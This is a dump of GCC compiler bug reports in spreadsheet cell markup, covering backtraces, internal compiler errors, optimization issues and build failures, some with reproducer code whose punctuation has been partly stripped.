#43 0x00007ffff6e80872 in error_callback (data= msg= errnum=) at /build/gcc-multilib/src/gcc/libgo/runtime/go-callers.c:154
        data = 
        errnum = 
        msg = 0x7fffffffb710 DWARF underflow in .debug_info at 4
#44 0x00007ffff7306510 in dwarf_buf_error (buf=buf@entry=0x7fffffffb950 msg=msg@entry=0x7ffff74b777f DWARF underflow) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:380
        b = DWARF underflow in .debug_info at 4\000\377\177\000\000@`\376\016\000\000\000\000\201\371\000\000\000\000\000\030\065E\366\377\177\000\000p\270\377\377\377\177\000\000\210\063\061\366\377\177\000\000\224\267\377\377\377\177\000\000`\270\377\377\377\177\000\000\320\331\371\367\377\177\000\000\a\000\000\000\000\000\000\000\240\270\377\377\000\000\000\000È­\277\365\377\177\000\000Ä·\377\377 '\000'  \320\331\371\367\377\177\000\000X\303\371\367\377\177\000\000\000\271\377\377\377\177\000\000\000\000\000\000\000\000\000\000\001 '\000'  (\271\377\377\377\177\000
#45 0x00007ffff7306a58 in require (count= buf=) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:394
No locals.
#46 advance (buf=0x7fffffffb950 count=) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:407
        count = 
        buf = 0x7fffffffb950
#47 0x00007ffff7306b17 in read_uint16 (buf=buf@entry=0x7fffffffb950) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:445
        p = 0x7ffff7ef9f99 
#48 0x00007ffff7309ab4 in build_address_map (addrs=0x7fffffffb8f0 data=0x7fffffffc170 error_callback=0x7ffff6e80840  is_bigendian=0 dwarf_str_size=20125 dwarf_str=0x7ffff7f25b37 \001 dwarf_ranges_size=10767 dwarf_ranges=0x7ffff7f3fde9 \001 dwarf_abbrev_size=2071 dwarf_abbrev=0x7ffff7f1cbbc \001 dwarf_info_size=142375 dwarf_info=0x7ffff7ef9f95 \001 base_address=0 state=0x7ffff7fa7000) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:1461
        len = 
        unit_buf = {
          name = 0x7ffff74b77f5 .debug_info 
          start = 0x7ffff7ef9f95 \001 
          buf = 0x7ffff7ef9f99  
          left = 1 
          is_bigendian = 0 
          error_callback = 0x7ffff6e80840  
          data = 0x7fffffffc170 
          reported_underflow = 0
        }
        u = 
        unit_data_start = 
        is_dwarf64 = 0
        version = 
        info = {
          name = 0x7ffff74b77f5 .debug_info 
          start = 0x7ffff7ef9f95 \001 
          buf = 0x7ffff7ef9f9a  
          left = 142370 
          is_bigendian = 0 
          error_callback = 0x7ffff6e80840  
          data = 0x7fffffffc170 
          reported_underflow = 0
        }
        abbrevs = {
          num_abbrevs = 0 
          abbrevs = 0x0
        }
#49 build_dwarf_data (data=0x7fffffffc170 error_callback=0x7ffff6e80840  is_bigendian=0 dwarf_str_size=20125 dwarf_str=0x7ffff7f25b37 \001 dwarf_ranges_size=10767 dwarf_ranges=0x7ffff7f3fde9 \001 dwarf_abbrev_size=2071 dwarf_abbrev=0x7ffff7f1cbbc \001 dwarf_line_size=34660 dwarf_line=0x7ffff7f1d3d3 \001 dwarf_info_size=142375 dwarf_info=0x7ffff7ef9f95 \001 base_address=0 state=0x7ffff7fa7000) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:2932
        addrs_vec = {
          vec = {
            base = 0x0 
            size = 0 
            alc = 0
          } 
          count = 0
        }
        addrs = 
        addrs_count = 
        fdata = 
#50 backtrace_dwarf_add (state=state@entry=0x7ffff7fa7000 base_address=base_address@entry=0 dwarf_info=0x7ffff7ef9f95 \001 dwarf_info_size=142375 dwarf_line=0x7ffff7f1d3d3 \001 dwarf_line_size=34660 dwarf_abbrev=0x7ffff7f1cbbc \001 dwarf_abbrev_size=2071 dwarf_ranges=0x7ffff7f3fde9 \001 dwarf_ranges_size=10767 dwarf_str=0x7ffff7f25b37 \001 dwarf_str_size=20125 is_bigendian=0 error_callback=0x7ffff6e80840  data=0x7fffffffc170 fileline_fn=0x7fffffffbd38) at /build/gcc-multilib/src/gcc/libbacktrace/dwarf.c:2992
No locals.
#51 0x00007ffff730b4a1 in elf_add (state=state@entry=0x7ffff7fa7000 descriptor=descriptor@entry=3 base_address=base_address@entry=0 error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7fffffffc170 fileline_fn=fileline_fn@entry=0x7fffffffbd38 found_sym=0x7fffffffbd30 found_dwarf=0x7fffffffbd34 exe=1) at /build/gcc-multilib/src/gcc/libbacktrace/elf.c:817
        ehdr_view = {
          data = 0x7ffff7fa5000 
          base = 0x7ffff7fa5000 
          len = 4096
        }
        ehdr = {
          e_ident = {     1 '\001'          } 
          e_type =  
          e_machine =  
          e_version =  
          e_entry =  
          e_phoff =  
          e_shoff =  
          e_flags =  
          e_ehsize =  
          e_phentsize =  
          e_phnum =  
          e_shentsize =  
          e_shnum =  
          e_shstrndx = 
        }
        shoff = 
        shnum = 
        shstrndx = 
        shdrs_view = {
          data = 0x7ffff7fa49c8 
          base = 0x7ffff7fa4000 
          len = 8192
        }
        shdrs_view_valid = 0
        shdrs = 
        shstrhdr = 
        shstr_size = 
        shstr_off = 
        names_view = {
          data = 0x7ffff7fa37f8 
          base = 0x7ffff7fa3000 
          len = 4096
        }
        names_view_valid = 0
        names = 
        symtab_shndx = 
        dynsym_shndx = 
        i = 
        sections = {{
            offset = 1105813 
            size = 142375 
            data = 0x7ffff7ef9f95 \001
          } {
            offset = 1250259 
            size = 34660 
            data = 0x7ffff7f1d3d3 \001
          } {
            offset = 1248188 
            size = 2071 
            data = 0x7ffff7f1cbbc \001
          } {
            offset = 1392105 
            size = 10767 
            data = 0x7ffff7f3fde9 \001
          } {
            offset = 1284919 
            size = 20125 
            data = 0x7ffff7f25b37 \001
          }}
        symtab_view = {
          data = 0x7ffff7f7c080 
          base = 0x7ffff7f7c000 
          len = 122880
        }
        symtab_view_valid = 1
        strtab_view = {
          data = 0x7ffff7f5e030 
          base = 0x7ffff7f5e000 
          len = 122880
        }
        strtab_view_valid = 1
        min_offset = 1105813
        max_offset = 
        debug_view = {
          data = 0x7ffff7ef9f95 
          base = 0x7ffff7ef9000 
          len = 303104
        }
        debug_view_valid = 1
#52 0x00007ffff730b947 in backtrace_initialize (state=state@entry=0x7ffff7fa7000 descriptor=3 error_callback=error_callback@entry=0x7ffff6e80840  data=data@entry=0x7ffffff</t>
  </si>
  <si>
    <t>GCC-2998</t>
  </si>
  <si>
    <t>function.c: 7030: missing #endif when building for SunOS 4.1.4</t>
  </si>
  <si>
    <t>function.c has an indented #endif on line 6930.
The ancient C compiler supplied with SunOS 4.1.4
(and probably other systems) doesn't
recognize preprocessor directives unless they're in the
first column so stage1 build fails with
.../gcc/function.c: 7030: missing #endif.
Release:
gcc version 2.95.3 20010315 (release)
Environment:
SunOS 4.1.4</t>
  </si>
  <si>
    <t>vannoy</t>
  </si>
  <si>
    <t>GCC-34265</t>
  </si>
  <si>
    <t>Missed optimizations</t>
  </si>
  <si>
    <t>I have had a closer look to the optimization of the polyhedron test  induct.f90. 
3/4 of the runtime is spent in the subroutine 'mutual_ind_quad_cir_coil' and 1/4 in 'mutual_ind_quad_rec_coil'.
The two subroutines contain two main loops with the following structure:
do i = 1 2*m
    ...
    do j = 1 9
	...
	do k = 1 9
	    q_vector(1) = 0.5_longreal * a * (x2gauss(k) + 1.0_longreal)
	    q_vector(2) = 0.5_longreal * b1 * (y2gauss(k) - 1.0_longreal)
	    q_vector(3) = 0.0_longreal
!
!       rotate quad vector into the global coordinate system
!
	    rot_q_vector(1) = dot_product(rotate_quad(1:)q_vector(:))
	    rot_q_vector(2) = dot_product(rotate_quad(2:)q_vector(:))
	    rot_q_vector(3) = dot_product(rotate_quad(3:)q_vector(:))
!
!       compute and add in quadrature term
!
	    numerator = w1gauss(j) * w2gauss(k) *                         &amp;
			dot_product(coil_current_veccurrent_vector)
	    denominator = sqrt(dot_product(rot_c_vector-rot_q_vector     &amp;
					   rot_c_vector-rot_q_vector))
	    l12_lower = l12_lower + numerator/denominator
	end do
    end do
end do
where the six first lines of code in the k loop do not depend on i nor j
and can be computed in a 'do k = 1 9' loop outside the main loop by
replacing the length-three vector 'rot_q_vector' by a nine by three array.
The original code induct.f90 gives the following timing (all with -O3 
-ffast-math -funroll-loops):
93.227u 0.094s 1:33.32 99.9%	0+0k 0+0io 0pf+0w
and output:
...
Maximum wand/quad abs rel mutual inductance =   5.95379428444656467E-002
Minimum resq coil/quad abs rel mutual inductance =    0.0000000000000000     
Maximum resq coil/quad abs rel mutual inductance =   9.63995250242061230E-002
...
Unrolling bye hand 'numerator' and 'denominator' gives (see 
http://gcc.gnu.org/ml/fortran/2007-11/msg00231.html):
65.563u 0.092s 1:05.66 99.9%	0+0k 0+0io 0pf+0w
Looking at the assembly I can see that for the original code the inner loops in k are not  unrolled as guessed by Paul Thomas (only the implied vector loops being unrolled).
QUESTION 1: Should the frontend do the unrolling for small vectors itself? or should the middleend be more aggressive for nested loops with small known iterations?
Moving the invariants on i and j in the k loops outside the main loops gives:
80.313u 0.074s 1:20.39 99.9%	0+0k 0+1io 0pf+0w
Combining the two hand optimizations gives:
35.925u 0.040s 0:35.97 99.9%	0+0k 0+0io 0pf+0w
(without -ffast-math the timing is
59.263u 0.067s 0:59.33 99.9%	0+0k 0+1io 0pf+0w)
but the results change to:
Maximum wand/quad abs rel mutual inductance =   5.95379428444656675E-002
Minimum resq coil/quad abs rel mutual inductance =    0.0000000000000000     
Maximum resq coil/quad abs rel mutual inductance =   9.63995250242059842E-002
( Maximum wand/quad abs rel mutual inductance =   5.95379428444659520E-002
  Minimum resq coil/quad abs rel mutual inductance =    0.0000000000000000     
  Maximum resq coil/quad abs rel mutual inductance =   9.63995250242060675E-002
without -ffast-math).
The attached file gives the differences between the original code and the three variants.
This is to be compared to further optimizations (indu.v2.f90) leading to:
35.376u 0.062s 0:35.44 99.9%	0+0k 0+1io 0pf+0w
or after merging the two loops (indu.v3.f90) to:
34.452u 0.041s 0:34.49 100.0%	0+0k 0+0io 0pf+0w
I have counted the number of sqrt() in the assembly code and found 9 of them in the slow codes while I only found 5 (10 for indu.v3.f90) of them for the fast codes. I checked that this was not due to common 
subexpressions I may have missed. Looking more closely to the assemby I saw that he slow codes used 'sqrtsd' while the fast ones used 'sqrtpd' along with several other packed operations. Now 65.66*5/9=36.48 explaining most of the speedup. Note that 5=9/2+1 i.e. four packed computations 
followed by a scalar one.  Owing to the same structure in the two loops the two scalar computations could be merged in a packed one but it is missed by the optimizer.
I have tried without success to trigger this vectorization by making some variables vectors in k.
QUESTION 2:  Why the optimizer is able to vectorize in some cases and not in others? Can the frontend help to vectorize?</t>
  </si>
  <si>
    <t>GCC-48384</t>
  </si>
  <si>
    <t>lto linker-plugin and optimization clutter the stack trace</t>
  </si>
  <si>
    <t>Created attachment 23835
an header file three compilation units a script to source that will produce several shared libraries and executables
I'm testing lto and the linker-plugin within shared libraries.
Results using hidden visibility are very encouraging. Unfortunately the combination of even mild optimization (O2) and -flto -fuse-linker-plugin seems to clutter the stack-trace. This can be easily
shown in gdb. It makes also instrumentation tools that rely on stack trace to either crash or produce wrong results.
I'm using 
gcc -v
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-unknown-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --enable-gold=yes --enable-lto --with-fpmath=avx
Thread model: posix
gcc version 4.6.1 20110325 (prerelease) (GCC) 
GNU gold (GNU Binutils 2.21) 1.10
Linux vinavx0.cern.ch 2.6.32-71.14.1.el6.x86_64 #1 SMP Thu Jan 13 12:03:40 CET 2011 x86_64 x86_64 x86_64 GNU/Linux
glibc.x86_64                           2.12-1.7.el6_0.4  
GNU gdb (GDB) Red Hat Enterprise Linux (7.1-29.el6_0.1)
In  the attachment there are the four  files of my simple test (a long loop and a seg-fault)
and a script that builds various versions
just compare
g++ -g -DHIDDEN go.cc foo.cc -flto -fuse-linker-plugin -fPIC -shared -o libfoo_hltog.so
g++ -g -DHIDDEN main.cc -flto -fuse-linker-plugin -L./ -lfoo_hltog -o t_hltog
with
g++ -O2 -g -DHIDDEN go.cc foo.cc -flto -fuse-linker-plugin -fPIC -shared -o libfoo_hltog2.so
g++ -O2 -g -DHIDDEN main.cc -flto -fuse-linker-plugin -L./ -lfoo_hltog2 -o t_hltog2
the first looks ok
(the segmentation fault deferencing a zero pointer is intentional)
the latter in gdb will produce
(gdb) run
Starting program: /afs/cern.ch/user/i/innocent/public/ctest/lto/t_hltog2 
Program received signal SIGSEGV Segmentation fault.
go (j=Cannot access memory at address 0x0
) at go.cc:5
5	  j+= foo(h)
Missing separate debuginfos use: debuginfo-install glibc-2.12-1.7.el6_0.4.x86_64
(gdb) where
#0  go (j=Cannot access memory at address 0x0
) at go.cc:5
#1  0x00000000000003e8 in ?? ()
#2  0x42c800004232ee1f in ?? ()
#3  0x0000000000000000 in ?? ()
(gdb) run 2
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /afs/cern.ch/user/i/innocent/public/ctest/lto/t_hltog2 2
^C
Program received signal SIGINT Interrupt.
0x0000003ff6207ebd in __ieee754_asin () from /lib64/libm.so.6
(gdb) where
#0  0x0000003ff6207ebd in __ieee754_asin () from /lib64/libm.so.6
#1  0x0000003ff6224842 in asin () from /lib64/libm.so.6
#2  0x00007ffff7ffb6aa in bar (j=20000001 h=0x0) at foo.cc:14
#3  go (j=20000001 h=0x0) at go.cc:4
#4  0x0000000000989680 in ?? ()
#5  0x3f8000003f800001 in ?? ()
#6  0x0000000000000000 in ?? ()
(gdb) 
in more complex applications with multiple shared libraries things gets much more confused with ??
all over the srack-trace</t>
  </si>
  <si>
    <t>GCC-48936</t>
  </si>
  <si>
    <t>[4.3/4.4/4.5 Regression] sizeof template parm not considered constant expression</t>
  </si>
  <si>
    <t>template  int foo (void)
template  struct S
{
  static const unsigned int a = sizeof (T)
  enum { c = sizeof (foo  ()) }
}
S x
compiles fine with 3.3 3.4 4.6 and trunk fails in 4.0 - 4.5 with:
x.C: In instantiation of â€˜Sâ€™:
x.C:7:   instantiated from here
x.C:5: error: â€˜(((unsigned int)S::a) == 0u)â€™ is not a valid template argument for type â€˜boolâ€™ because it is a non-constant expression
x.C:5: error: no matching function for call to â€˜foo()â€™
http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=163895
http://gcc.gnu.org/viewcvs?root=gcc&amp;view=rev&amp;rev=166164
is what fixed it for 4.6/4.7 but Jason has a smaller fix for the older release branches.</t>
  </si>
  <si>
    <t>GCC-61367</t>
  </si>
  <si>
    <t>Annoying rtx cost information in middle end dumps on arm/aarch64 targets</t>
  </si>
  <si>
    <t>Created attachment 32877
zipped dump files.
Given a simple program like:
#define LEN (32000)
__attribute__((aligned(16))) float a[LEN]b[LEN]
int s174 (int M)
{
  for (int i = 0 i &lt; M i++)
    {
      a[i+M] = a[i] + b[i]
    }
  return 0
}
Build with O2/O3 -fdump-tree-all-details -fdump-rtl-all-details options.  The middle-end's dump files contain lots of rtx cost information which messes up with true dump information.  The dump files of ivopt/cse2 are attached to show this annoying problem.</t>
  </si>
  <si>
    <t>GCC-7352</t>
  </si>
  <si>
    <t>typo in bits/slice_array.h (_DEFINE_VALARRAY_OPERATOR)</t>
  </si>
  <si>
    <t>The attached change is necessary to successfully compile code that ends up bringing in slice_array.h.  Without it the macro substitution in _DEFINE_VALARRAY_OPERATOR causes the invalid name '_Array_augmented__Name' to be attempted.
2002-07-18  Brendan Kehoe  
	* bits/slice_array.h (_DEFINE_VALARRAY_OPERATOR): Fix typo of
	_Nname to _Name.
Release:
development tree</t>
  </si>
  <si>
    <t>GCC-36929</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] internal compiler error: Segmentation fault</t>
  </si>
  <si>
    <t>$ m68k-linux-gcc -O2 -m5200 route.i
/home/bunk/linux/kernel-2.6/git/linux-2.6/net/ipv4/route.c: In function 'ipv4_sysctl_rtcache_flush':
/home/bunk/linux/kernel-2.6/git/linux-2.6/net/ipv4/route.c:2896: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$</t>
  </si>
  <si>
    <t>GCC-70499</t>
  </si>
  <si>
    <t>internal compiler error: in make_ssa_name_fn at tree-ssanames.c:266</t>
  </si>
  <si>
    <t>The compiler crashes with the given code. Multiple (in fact probably all) versions are affected. Tested versions are 4.7 4.8 4.9 5.1 5.3 and 6.0 (4.6 and earlier don't accept -mavx2). Exact versions and abort messages are given below.
Thanks!
The code:
//////////////////////////////////////////////////////////
#include 
struct SIMD {
  __m256d data
  SIMD() {}
  SIMD (double val) { }
  SIMD(__m256d _data) { data = _data }
  SIMD operator* (SIMD a) { return a }
}
struct Foo {
  SIMD val
  SIMD dval[2]
  __attribute__((__always_inline__)) SIMD  }
  __attribute__((__always_inline__)) Foo operator* ( const Foo &amp; y) throw() 
    {
      Foo res
      SIMD hx
      SIMD hy
      res.Value() = hx*hy
      res.dval[0] = hx*hy
      return res
    }
}
template  
__attribute__((__always_inline__)) void inlineFunc(Tx hx[]) {
    Tx x = hx[0] y = hx[1]
    Tx lam[1] = (x*y)
}
void FooBarFunc () {
  Foo adp[2]
  inlineFunc (adp)
}
//////////////////////////////////////////////////////////
Abort messages:
=================================================================
g++-4.7 -v
Using built-in specs.
COLLECT_GCC=g++-4.7
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.7/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.7.3-12ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.7/README.Bugs --enable-languages=cc++gofortranobjcobj-c++ --prefix=/usr --program-suffix=-4.7 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.7 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --enable-objc-gc --with-cloog --enable-cloog-backend=ppl --disable-cloog-version-check --disable-ppl-version-check --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.7.3 (Ubuntu/Linaro 4.7.3-12ubuntu1) 
g++-4.7 -mavx2 -O2 -c simd.cpp
simd.cpp:27:41: warning: always_inline function might not be inlinable [-Wattributes]
simd.cpp: In function â€˜void inlineFunc(Tx*) [with Tx = Foo]â€™:
simd.cpp:35:1: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc7UN6UV.out file please attach this to your bugreport.
ERROR: Cannot create report: [Errno 17] File exists: '/var/crash/_usr_lib_gcc_x86_64-linux-gnu_4.7_cc1plus.1028.crash'
=================================================================
g++-4.8 -v
Using built-in specs.
COLLECT_GCC=g++-4.8
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.8.2-19ubuntu1' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.8 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.8 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-libmudflap --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.8-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.8-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) 
g++-4.8 -mavx2 -O2 -c simd.cpp
simd.cpp:27:41: warning: always_inline function might not be inlinable [-Wattributes]
 __attribute__((__always_inline__)) void inlineFunc(Tx hx[]) {
                                         ^
simd.cpp: In function â€˜void FooBarFunc()â€™:
simd.cpp:34:19: internal compiler error: in make_ssa_name_fn at tree-ssanames.c:120
   inlineFunc (adp)
                   ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc4OHJf8.out file please attach this to your bugreport.
ERROR: Cannot create report: [Errno 17] File exists: '/var/crash/_usr_lib_gcc_x86_64-linux-gnu_4.8_cc1plus.1028.crash'
=================================================================
g++-4.9 -v
Using built-in specs.
COLLECT_GCC=g++-4.9
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.9.1-3ubuntu2~14.04.1' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=cc++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.9.1 (Ubuntu 4.9.1-3ubuntu2~14.04.1) 
g++-4.9 -mavx2 -O2 -c simd.cpp
simd.cpp:27:41: warning: always_inline function might not be inlinable [-Wattributes]
 __attribute__((__always_inline__)) void inlineFunc(Tx hx[]) {
                                         ^
simd.cpp: In function â€˜void FooBarFunc()â€™:
simd.cpp:34:19: internal compiler error: in make_ssa_name_fn at tree-ssanames.c:136
   inlineFunc (adp)
                   ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/ccZAXDyC.out file please attach this to your bugreport.
=================================================================
g++-5 -v
Using built-in specs.
COLLECT_GCC=/usr/bin/g++-5
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/5/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 5.1.0-0ubuntu11~14.04.1' --with-bugurl=file:///usr/share/doc/gcc-5/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-5 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=c++98 --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-5-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-5-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-5-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 5.1.0 (Ubuntu 5.1.0-0ubuntu11~14.04.1) 
g++-5 -mavx2 -O2 -c simd.cpp
simd.cpp:27:41: warning: always_inline function might not be inlinable [-Wattributes]
 __attribute__((__always_inline__)) void inlineFunc(Tx hx[]) {
                                         ^
simd.cpp: In function â€˜void FooBarFunc()â€™:
simd.cpp:34:19: internal compiler error: in make_ssa_name_fn at tree-ssanames.c:150
   inlineFunc (adp)
                   ^
0xc25cab make_ssa_name_fn(function* tree_node* gimple_statement_base*)
	../../src/gcc/tree-ssanames.c:147
0xb05fa7 make_ssa_name
	../../src/gcc/tree-ssanames.h:107
0xb05fa7 remap_ssa_name
	../../src/gcc/tree-inline.c:280
0xb080af remap_gimple_op_r
	../../src/gcc/tree-inline.c:901
0xc965a4 walk_tree_1(tree_node** tree_node* (*)(tree_node** int* void*) void* hash_set* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* hash_set*))
	../../src/gcc/tree.c:11093
0x9020b4 walk_gimple_op(gimple_statement_base* tree_node* (*)(tree_node** int* void*) walk_stmt_info*)
	../../src/gcc/gimple-walk.c:282
0xb06fbc remap_gimple_stmt
	../../src/gcc/tree-inline.c:1729
0xb08e30 copy_bb
	../../src/gcc/tree-inline.c:1788
0xb08e30 copy_cfg_body
	../../src/gcc/tree-inline.c:2745
0xb08e30 copy_body
	../../src/gcc/tree-inline.c:2984
0xb0ba06 expand_call_inline
	../../src/gcc/tree-inline.c:4653
0xb0ba06 gimple_expand_calls_inline
	../../src/gcc/tree-inline.c:4791
0xb0ba06 optimize_inline_calls(tree_node*)
	../../src/gcc/tree-inline.c:4931
0xff06db early_inliner(function*)
	../../src/gcc/ipa-inline.c:2689
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
=================================================================
/usr/bin/c++ -v
Using built-in specs.
COLLECT_GCC=/usr/bin/c++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-unknown-linux-gnu/5.3.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /build/gcc/src/gcc-5-20160209/configure --prefix=/usr --libdir=/usr/lib --libexecdir=/usr/lib --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=https://bugs.archlinux.org/ --enable-languages=cc++adafortrangoltoobjcobj-c++ --enable-shared --enable-threads=posix --enable-libmpx --with-system-zlib --with-isl --enable-__cxa_atexit --disable-libunwind-exceptions --enable-clocale=gnu --disable-libstdcxx-pch --disable-libssp --enable-gnu-unique-object --enable-linker-build-id --enable-lto --enable-plugin --enable-install-libiberty --with-linker-hash-style=gnu --enable-gnu-indirect-function --disable-multilib --disable-werror --enable-checking=release
Thread model: posix
gcc version 5.3.0 (GCC) 
/usr/bin/c++ -mavx2 -O2 -c simd.cpp
simd.cpp:27:41: warning: always_inline function might not be inlinable [-Wattributes]
 __attribute__((__always_inline__)) void inlineFunc(Tx hx[]) {
                                         ^
simd.cpp: In function â€˜void FooBarFunc()â€™:
simd.cpp:34:19: internal compiler error: in make_ssa_name_fn at tree-ssanames.c:151
   inlineFunc (adp)
                   ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
=================================================================
g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/home/matthias/local/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../configure --prefix=/usr --disable-multilib --disable-bootstrap --with-system-zlib --prefix=/home/matthias/local --enable-languages=cc++lto --no-create --no-recursion
Thread model: posix
gcc version 6.0.0 20160321 (experimental) (GCC) 
g++ -mavx2 -O2 -c simd.cpp
simd.cpp:27:41: warning: always_inline function might not be inlinable [-Wattributes]
 __attribute__((__always_inline__)) void inlineFunc(Tx hx[]) {
                                         ^~~~~~~~~~
simd.cpp: In function â€˜void FooBarFunc()â€™:
simd.cpp:34:19: internal compiler error: in make_ssa_name_fn at tree-ssanames.c:266
   inlineFunc (adp)
                   ^
0xf2da17 make_ssa_name_fn(function* tree_node* gimple*)
	../../gcc/tree-ssanames.c:263
0xda3684 make_ssa_name
	../../gcc/tree-ssanames.h:111
0xda3684 remap_ssa_name
	../../gcc/tree-inline.c:238
0xda9fd7 remap_gimple_op_r
	../../gcc/tree-inline.c:867
0xfd0142 walk_tree_1(tree_node** tree_node* (*)(tree_node** int* void*) void* hash_set &gt;* tree_node* (*)(tree_node** int* tree_node* (*)(tree_node** int* void*) void* hash_set &gt;*))
	../../gcc/tree.c:11531
0xabf73b walk_gimple_op(gimple* tree_node* (*)(tree_node** int* void*) walk_stmt_info*)
	../../gcc/gimple-walk.c:266
0xda450c remap_gimple_stmt
	../../gcc/tree-inline.c:1713
0xda56fe copy_bb
	../../gcc/tree-inline.c:1771
0xda6bb8 copy_cfg_body
	../../gcc/tree-inline.c:2725
